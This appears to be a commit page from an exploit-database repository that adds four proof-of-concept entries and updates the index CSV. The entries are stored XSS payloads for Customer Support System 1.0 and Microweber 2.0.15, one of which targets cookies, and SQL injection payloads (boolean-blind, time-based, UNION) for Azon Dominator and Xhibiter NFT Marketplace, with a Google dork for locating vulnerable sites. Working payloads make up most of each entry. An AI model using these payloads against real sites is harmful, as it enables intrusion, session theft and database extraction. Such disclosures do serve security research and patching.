Merge remote-tracking branch 'upstream/main'

CERTCC · Jul 2, 2024 · a09a123 · a09a123
2 parents c91b1f1 + ec14967
commit a09a123
Show file tree

Hide file tree

Showing 5 changed files with 105 additions and 0 deletions.
diff --git a/exploits/php/webapps/52057.txt b/exploits/php/webapps/52057.txt
@@ -0,0 +1,17 @@
+# Exploit Title:  Customer Support System 1.0 - (XSS) Cross-Site
+Scripting Vulnerability in the "subject" at "ticket_list"
+# Date: 28/11/2023
+# Exploit Author: Geraldo Alcantara
+# Vendor Homepage:
+https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows
+# CVE : CVE-2023-49976
+*Steps to reproduce:*
+1- Log in to the application.
+2- Visit the ticket creation/editing page.
+3- Create/Edit a ticket and insert the malicious payload into the
+"subject" field/parameter.
+Payload: <dt/><b/><script>alert(document.domain)</script>
diff --git a/exploits/php/webapps/52058.txt b/exploits/php/webapps/52058.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Stored XSS in Microweber
+# Date: 06/18/2024
+# Exploit Author: tmrswrr
+# Vendor Homepage: (https://microweber.me/)
+# Version: 2.0.15
+# Tested on: (http://active.demo.microweber.me/)
+
+## Vulnerability Description
+A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+
+## Steps to Reproduce
+1. Log in to the application.
+2. Navigate to `Users > Edit Profile`.
+3. In the `First Name` field, input the following payload:
+
+    "><img src=x onerror=confirm(document.cookie)>
+
+4. Save the changes.
+5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
diff --git a/exploits/php/webapps/52059.txt b/exploits/php/webapps/52059.txt
@@ -0,0 +1,38 @@
+ # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
+# Date: 2024-06-03
+# Exploit Author: Buğra Enis Dönmez
+# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
+# Demo Site: https://azon-dominator.webister.net/
+# Tested on: Arch Linux
+# CVE: N/A
+
+### Request ###
+
+POST /fetch_products.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost/
+Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
+Content-Length: 79
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
+
+###
+
+### Parameter & Payloads ###
+
+Parameter: cid (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: cid=1) AND 7735=7735 AND (5267=5267
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
+
+###
diff --git a/exploits/php/webapps/52060.txt b/exploits/php/webapps/52060.txt
@@ -0,0 +1,27 @@
+# Exploit Title: xhibiter nft marketplace SQLI
+# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
+# Date: 29/06/204
+# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
+# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
+# Version: 1.10.2
+# Tested on: linux
+# CVE : [if applicable]
+
+on this dir
+https://localhost/collections?id=2
+xhibiter nft marketplace suffers from SQLI
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 36 columns
+    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+---
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -14543,6 +14543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1081;OSVDB-15526,,,,,https://www.securityfocus.com/bid/13082/info
 25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1082;OSVDB-15524,,,,,https://www.securityfocus.com/bid/13082/info
 12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,webapps,php,,2010-05-21,,0,,,,,,
+52059,exploits/php/webapps/52059.txt,"Azon Dominator Affiliate Marketing Script - SQL Injection",2024-07-01,"Buğra Enis Dönmez",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,webapps,php,,2005-03-06,,1,OSVDB-14632;CVE-2005-0700,,,,,
 1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,webapps,php,,2006-03-25,2017-04-07,1,,,,,,
 24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",webapps,php,,2004-11-12,2013-03-12,1,CVE-2004-2725;OSVDB-11704,,,,,https://www.securityfocus.com/bid/11654/info
@@ -16659,6 +16660,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
 49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
+52057,exploits/php/webapps/52057.txt,"Customer Support System 1.0 - Stored XSS",2024-07-01,"Geraldo Alcantara",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 50994,exploits/php/webapps/50994.txt,"CuteEditor for PHP 6.6 - Directory Traversal",2022-08-01,"Stefan Hesselman",webapps,php,,2022-08-01,2022-08-01,0,,,,,,
 9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",webapps,php,,2009-08-23,,1,CVE-2009-2960;OSVDB-57391,,,,,
 20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,webapps,php,,2012-07-27,2012-07-27,1,OSVDB-84289,"Metasploit Framework (MSF)",,,,
@@ -23507,6 +23509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2015-08-07,0,OSVDB-125875,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2016-08-30,0,OSVDB-125873,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
 50768,exploits/php/webapps/50768.txt,"Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)",2022-02-21,"Chetanya Sharma",webapps,php,,2022-02-21,2022-02-21,0,CVE-2022-0557,,,,,
+52058,exploits/php/webapps/52058.txt,"Microweber 2.0.15 - Stored XSS",2024-07-01,tmrswrr,webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,webapps,php,,2014-04-13,2014-04-13,1,OSVDB-105791,,,http://www.exploit-db.com/screenshots/idlt33000/screen-shot-2014-04-13-at-104833.png,http://www.exploit-db.commicroweber-0.9343.zip,
 35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",webapps,php,80,2015-01-07,2015-01-07,0,CVE-2014-9464;OSVDB-116689,,,,http://www.exploit-db.commicroweber-0.934.tar.gz,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,,2021-05-10,2021-05-10,0,CVE-2020-28337,,,,,
@@ -34356,6 +34359,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",webapps,php,,2005-02-08,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12489/info
 21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,webapps,php,,2002-04-15,2012-09-19,1,OSVDB-86910,,,,,https://www.securityfocus.com/bid/4513/info
 8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,webapps,php,,2009-02-23,,1,OSVDB-52357;CVE-2009-0810,,,,,
+52060,exploits/php/webapps/52060.txt,"Xhibiter NFT Marketplace 1.10.2 - SQL Injection",2024-07-01,"Sohel Yousef",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,webapps,php,,2006-03-21,2016-06-30,1,OSVDB-24059;CVE-2006-1371;OSVDB-24058,,,,http://www.exploit-db.comxhp_0_5.tar.gz,
 28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",webapps,php,,2006-09-11,2013-09-25,1,CVE-2006-4751;OSVDB-28751,,,,,https://www.securityfocus.com/bid/19948/info
 40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",webapps,php,,2016-10-19,2016-10-19,0,,,,,http://www.exploit-db.comxhp_0_5_1.zip,